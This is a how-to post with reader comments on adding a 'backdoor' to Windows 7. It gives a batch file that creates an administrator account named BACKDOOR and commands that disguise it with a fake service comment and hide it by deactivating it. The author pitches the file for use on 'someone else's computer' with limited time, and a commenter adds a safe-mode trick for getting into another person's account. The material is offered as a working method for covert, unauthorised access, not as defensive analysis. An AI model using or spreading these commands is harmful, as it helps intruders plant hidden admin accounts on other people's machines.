HOW TO-Add Backdoor in Windows 7 This is a simple batch file “how to” nothing complicated. In my follow up video titled “HOW TO-Hide User Account in Windows 7”, I will show you how to hide your new backdoor from other users, so only you will know about it. ALSO… Keep an eye out for “HOW TO-Access Command Prompt from Login Screen in Windows 7″ @ECHO OFF NET USER BACKDOOR PASSWORD /ADD NET LOCALGROUP ADMINISTRATORS BACKDOOR /ADD Other user commands: @ECHO OFF REM LIST OF ALL USERS NET USERS REM INFO ON CERTAIN USER NET USERS BACKDOOR REM INFO ON LOCALGROUPS net localgroup REM ADDS BACKDOOR net users BACKDOOR /add or with password NET USER BACKDOOR PASSWORD /ADD REM MAKES NEWUSER ADMIN net localgroup administrators BACKDOOR /add REM ADDS OPTION FOR PASSWORD NET USERS BACKDOOR * OR NEW USER BACKDOOR PASSWORD REM EXPIRE ACCOUNT AT CERTAIN TIME NET USER BACKDOOR /EXPIRES:12/31/2010 OR NEVER EXPIRES (DEFAULT) NET USER BACKDOOR /EXPIRES:NEVER REM DISABLE ACCOUNT (MAKE ACCOUNT INVISIBLE) NET USER BACKDOOR /ACTIVE:NO OR Switch it on again NET USER BACKDOOR /ACTIVE:YES REM CHANGES NAME OF USER ON LOGON SCREEN (PURPOSE UNKNOWN) net user IUSR_WAN /fullname:”Remote Service Account” REM UNKNOWN net user BACKDOOR /comment:”Built-in account for Remote Service” REM ADD MULTIPLE COMMANDS IN DOS ON ONE LINE && REM DELETE USER NET USER BACKDOOR /DELETE REM EXAMPLE NET USER BACKDOOR PASSWORD /ADD && NET LOCALGROUP ADMINISTRATORS BACKDOOR /ADD
HOW TO-Add Backdoor in Windows 7
Posted in: Uncategorized
plz hry with the follow up vid ty ^^
ive found another way of gettin into windows 7 through someones account with a password.
Ok first we have to boot the computer up in safe mode (F8). When you have signed into your profile, START/ and type “cmd” in the search bar and press enter. Ok now you should have your Command Prompt window open. In Command Prompt type:
net user administrator /active:yes
All you have to do now is restart your computer, boot up in normal mode and click on the “administrator” account on the login screen.
#FTW
If you need admin rights/password to do it in Windows 7, then you already have/know what you need to create a user the GUI way, making this script pointless.
you sir are a GOD
@Windows7UIRocks Thanks =)
BTW You don’t have to create a batch file to do this. You can also open the command prompt as an Administrator and type the commands there, but the batch file can be a time saver if one is a slow typer and has limited time on someone else’s computer, and wants to use a flash stick instead.
omfg i bow to the awsomeness
lol all you did was create an account in the administrator group with the net command o.o funny how everyone thinks this is godly stuff xD I used to delete all the other hidden accounts from my XP with the net command. good old days :).
@SanosukeDK Yep, it’s not really all that useful until you hide the account LOL I haven’t even bothered to make that followup video for that. and the hidden accounts are easy enough to find for anyone who knows what they are doing.
@MMDeveloper unless login service fails in which case this may prove useful …. then again it might still not work
@MMDeveloper *Service not server
just use cmd